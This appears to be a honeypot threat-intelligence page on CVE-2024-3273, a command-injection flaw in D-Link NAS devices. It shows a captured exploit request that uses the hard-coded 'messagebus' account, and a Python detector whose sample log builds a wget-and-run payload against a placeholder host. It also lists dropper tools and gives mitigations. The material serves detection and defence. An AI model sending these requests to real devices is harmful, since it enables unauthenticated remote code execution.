Attack information

Tag
CVE-2024-3273
Date
2025-12-10
Client IP
64.225.115.99
Client GEO
United States
Vendor
D-Link
Product
DNS-320L
RAW request
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ%3D HTTP/1.0
Host: blog.██████
X-Forwarded-For: █████████████
Connection: close

Description

CVE-2024-3273 is a command injection vulnerability in D-Link NAS devices, specifically the DNS-320L, DNS-325, DNS-327L and DNS-340L, on all firmware up to the build dated 3 April 2024 (20240403). It resides in the HTTP GET request handler of /cgi-bin/nas_sharing.cgi: the value of the `system` query argument is base64-decoded and passed to a shell without validation, so anyone who can reach the web interface can execute arbitrary commands on the device. No real authentication is needed, because the same CGI accepts a hard-coded `messagebus` account with an empty password (tracked separately as CVE-2024-3272); the two flaws are chained in a single request.

The captured request above is exactly that chain. `user=messagebus&passwd=` selects the backdoor account, `cmd=15` is the code path the public proof of concept uses, and `system=aWQ%3D` is the URL-encoded base64 string `aWQ=`, which decodes to the command `id`. That is a reconnaissance probe: the scanner checks whether the target executes commands before sending a real payload, typically a download-and-execute dropper. The Host header shows the request was sent to an unrelated web server, which is characteristic of mass internet scanning rather than a targeted attack.

The vulnerability has been exploited in the wild since its public disclosure in April 2024; the researcher who disclosed it counted over 90,000 exposed devices, and proof-of-concept code is public. NVD rates CVE-2024-3273 itself at CVSS 7.3; the 9.8 often quoted for this issue is NVD's score for the companion credential flaw CVE-2024-3272. The affected models have reached end-of-life / end-of-service, and D-Link has stated that no firmware fix will be released.
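The following detector is an added example written for this page, not code from the honeypot or from D-Link. It does what the description above explains by hand: it parses HTTP request lines, recognises hits on /cgi-bin/nas_sharing.cgi, flags the `messagebus`/empty-password backdoor pattern and the base64 `system` argument, decodes the injected command the way the CGI would, and triages it as a reconnaissance probe or a malware download. It also serves the "Monitor and Respond" mitigation below. The sample log is constructed here (the first line is the request captured on this page; the download-and-execute line uses the placeholder host `example.invalid`).

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

VULN_PATH = "/cgi-bin/nas_sharing.cgi"
# Hard-coded account accepted by nas_sharing.cgi (CVE-2024-3272).
BACKDOOR_USER = "messagebus"
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
RECON_CMDS = {"id", "uname", "whoami", "cat", "ls", "pwd", "echo"}
DROPPER_CMDS = {"wget", "curl", "tftp", "ftpget", "busybox"}

# Constructed sample log. Line 1 is the request captured on this page; the
# others are made up here to show what the detector does and does not flag.
SAMPLE_LOG = [
    "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ%3D HTTP/1.0",
    "GET /cgi-bin/nas_sharing.cgi?user=admin&passwd=secret&cmd=1 HTTP/1.1",
    "GET /index.html HTTP/1.1",
    # Hypothetical second stage: same backdoor account, payload that fetches
    # and runs a script. Built with b64encode so the encoding is exact.
    "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system="
    + quote(base64.b64encode(b"wget http://example.invalid/a.sh -O /tmp/a; sh /tmp/a").decode(), safe="")
    + " HTTP/1.0",
]


def decode_system_arg(value):
    """Base64-decode the 'system' argument the way the CGI does before it
    hands the result to a shell. Returns None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def classify_command(cmd):
    """Rough triage of the injected command: probe vs. malware download."""
    tokens = re.findall(r"[A-Za-z0-9_./-]+", cmd)
    if any(t in DROPPER_CMDS for t in tokens):
        return "download-and-execute"
    if tokens and tokens[0] in RECON_CMDS:
        return "reconnaissance"
    return "other"


def analyze_request_line(line):
    """Return a finding dict for a request line that shows either indicator
    against the vulnerable CGI, or None for anything else."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != VULN_PATH:
        return None
    # keep_blank_values so that "passwd=" (empty password) is preserved;
    # parse_qs also undoes the URL encoding, so %3D becomes "=".
    qs = parse_qs(url.query, keep_blank_values=True)

    def first(key):
        return qs.get(key, [None])[0]

    finding = {
        "user": first("user"),
        "cmd": first("cmd"),
        "system_raw": first("system"),
        "decoded_command": None,
        "stage": None,
        "indicators": [],
    }
    if finding["user"] == BACKDOOR_USER and first("passwd") == "":
        finding["indicators"].append("CVE-2024-3272 backdoor account")
    if finding["system_raw"] is not None:
        finding["indicators"].append("CVE-2024-3273 system argument")
        finding["decoded_command"] = decode_system_arg(finding["system_raw"])
        if finding["decoded_command"] is not None:
            finding["stage"] = classify_command(finding["decoded_command"])
    return finding if finding["indicators"] else None


def scan_log(lines):
    """Run the detector over request lines; returns only the hits."""
    return [f for f in (analyze_request_line(l) for l in lines) if f]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["user"], hit["cmd"], hit["stage"], repr(hit["decoded_command"]), hit["indicators"])
```

Feed it the request lines from a reverse-proxy or honeypot log; a hit whose decoded command is `id` is the probe seen on this page, and a later hit from the same source with stage `download-and-execute` means the scanner believed the probe succeeded. Decoding is done with strict base64 validation, so a malformed `system` value is still reported as an attempt but with `decoded_command` left as None rather than raising.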

Mitigations
  1. Retire and Replace: The affected models are end-of-life and will not receive a fix, so the only complete remediation is to retire them and move the data to a supported device.
  2. Network Segmentation: Place any NAS still in service on a VLAN reachable only from the hosts that need it, and never expose its web interface to the internet (check for port forwards and UPnP mappings on the router).
  3. Firewall Rules: Block access to the management interface from untrusted networks; if the device sits behind a reverse proxy, deny requests for /cgi-bin/nas_sharing.cgi outright, since no legitimate client needs that CGI from outside.
  4. Monitor and Respond: Alert on requests to /cgi-bin/nas_sharing.cgi that carry a `system` parameter or `user=messagebus`. A hit that received a successful response should be treated as a compromise, because the `id` probe is normally followed by a malware download; isolate the device and rebuild it from clean firmware.
  5. Disable Unnecessary Services: Turn off remote access, cloud and media-sharing features that are not in use to reduce the attack surface.
  6. Vendor Consultation: D-Link's own guidance for these end-of-life models is replacement; consult a security professional for compensating controls if the device cannot be replaced immediately.